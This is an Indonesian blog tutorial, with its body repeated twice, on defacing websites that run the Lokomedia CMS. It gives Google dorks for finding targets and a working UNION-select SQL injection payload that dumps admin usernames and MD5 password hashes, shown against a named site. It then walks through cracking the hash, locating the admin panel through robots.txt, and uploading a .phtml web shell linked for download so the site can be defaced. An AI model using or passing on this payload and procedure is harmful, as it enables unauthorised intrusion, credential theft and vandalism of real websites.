Tutorial Deface dengan cara Sql Lokomedia Terbaru 2019
Oh ya, saya ingin berbagi cara mengekspos ini, tetapi dengan cara yang berbeda: v, kali ini saya membagikan bagaimana saya bisa menghapusnya menggunakan SQL LOKOMEDIA: v
Oh ya, sebelum saya tahu guru, saya ingin bertanya: v, Klean, semua marah pada hari Jumat ini, apa yang Anda lakukan> :(, jangan lakukan itu ........... ahh sudah lupa: v ... Mari kita lihat caranya: V
Bahan Bahan :
#Dork : inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html [ Kembangin lagi dorknya biar dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]
#Bagi yg blom pnya shell format .phtml bisa di download disini ~> https://uploadfiles.io/72upn
password shellnya : akugans
#Exploit :
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
#Admin finder online/admin finder tools jg boleh :v
#oh ea , saran ane sih sambil dengerin musik Marshmello :v
Caranya :
1. seperti biasa kita buka google dan masukkan dork di atas. Kemudian pilih salah satu situs web tetapi cari halaman statis: v, lihat gambar: v
2. nah ane udh dapet targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar
3. nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v
4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA
5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tulisan admin, nah copy angkanya saatnya kita hash online passwordnya di https://hashkiller.co.uk/md5-decrypter.aspx ,,, nah dan jreng jreng ane udh berhasil nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan muncul di sebelah kanan, nih liat gambar
6. baik sudah kata sandi asli, sekarang kita sedang mencari di mana admin login, admin admin online, juga alat admin finder: v, juga dapat digunakan secara manual, saya belajar, bagaimana
*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi gini http://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg tulisan disallow nya, karna itu disallownya /adminw36 berarti halaman admin login ada di http://sewakursimejamurah.com/adminw36 ] , paham kan? liat gambar :v
7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini http://sewakursimejamurah.com/adminw36 klo udh berhasil msk maka tampilan nya akan seperti ini
8. Daaaaan Boom!!! kita udh berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya kalem ane jelasin :v OK , dimana tempat buat tanem shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v
9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v
10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v
11. ok jika shell telah berhasil diunggah, sekarang kami sedang mencari akses shell / dapatkah Anda mengatakan di mana shell Anda? ok begini caranya kita tinggal menambahkan / files / nameelllu. Kaya gini merasa bahwa saya telah menemukan shell akses lihat gambar: v
hehe adalah apa yang ingin Anda lakukan: v, Slash index atau gap: v
TETAPI INGAT bahwa jika Anda ingin memotong indeks, coba indeks cadangan untuk mengeluh admin untuk membuat indeks skrip lag: "(
Jika Anda ingin menjadi brengsek, tidak bertanggung jawab, tetapi jika Anda ingin menjadi brengsek, jangan ragu
h3h3 itu hanya ya: v, ok sudah cukup jadi beberapa guru saya, saya akan berbagi metode pertahanan lainnya, sampai jumpa lagi kawan: v
Oh ya, jika ada tautan atau gambar yang tidak muncul atau jika ada orang yang tidak mengerti, saya dapat segera menghubungi saya
Oh ya, sebelum saya tahu guru, saya ingin bertanya: v, Klean, semua marah pada hari Jumat ini, apa yang Anda lakukan> :(, jangan lakukan itu ........... ahh sudah lupa: v ... Mari kita lihat caranya: V
Bahan Bahan :
#Dork : inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html [ Kembangin lagi dorknya biar dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]
#Bagi yg blom pnya shell format .phtml bisa di download disini ~> https://uploadfiles.io/72upn
password shellnya : akugans
#Exploit :
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
#Admin finder online/admin finder tools jg boleh :v
#oh ea , saran ane sih sambil dengerin musik Marshmello :v
Caranya :
1. seperti biasa kita buka google dan masukkan dork di atas. Kemudian pilih salah satu situs web tetapi cari halaman statis: v, lihat gambar: v
2. nah ane udh dapet targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar
3. nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v
4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA
5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tulisan admin, nah copy angkanya saatnya kita hash online passwordnya di https://hashkiller.co.uk/md5-decrypter.aspx ,,, nah dan jreng jreng ane udh berhasil nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan muncul di sebelah kanan, nih liat gambar
You may also like...
6. baik sudah kata sandi asli, sekarang kita sedang mencari di mana admin login, admin admin online, juga alat admin finder: v, juga dapat digunakan secara manual, saya belajar, bagaimana
*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi gini http://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg tulisan disallow nya, karna itu disallownya /adminw36 berarti halaman admin login ada di http://sewakursimejamurah.com/adminw36 ] , paham kan? liat gambar :v
7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini http://sewakursimejamurah.com/adminw36 klo udh berhasil msk maka tampilan nya akan seperti ini
8. Daaaaan Boom!!! kita udh berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya kalem ane jelasin :v OK , dimana tempat buat tanem shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v
9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v
10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v
11. ok jika shell telah berhasil diunggah, sekarang kami sedang mencari akses shell / dapatkah Anda mengatakan di mana shell Anda? ok begini caranya kita tinggal menambahkan / files / nameelllu. Kaya gini merasa bahwa saya telah menemukan shell akses lihat gambar: v
hehe adalah apa yang ingin Anda lakukan: v, Slash index atau gap: v
TETAPI INGAT bahwa jika Anda ingin memotong indeks, coba indeks cadangan untuk mengeluh admin untuk membuat indeks skrip lag: "(
Jika Anda ingin menjadi brengsek, tidak bertanggung jawab, tetapi jika Anda ingin menjadi brengsek, jangan ragu
h3h3 itu hanya ya: v, ok sudah cukup jadi beberapa guru saya, saya akan berbagi metode pertahanan lainnya, sampai jumpa lagi kawan: v
Oh ya, jika ada tautan atau gambar yang tidak muncul atau jika ada orang yang tidak mengerti, saya dapat segera menghubungi saya
Open Comments
Close Comments
Post a Comment for "Tutorial Deface dengan cara Sql Lokomedia Terbaru 2019"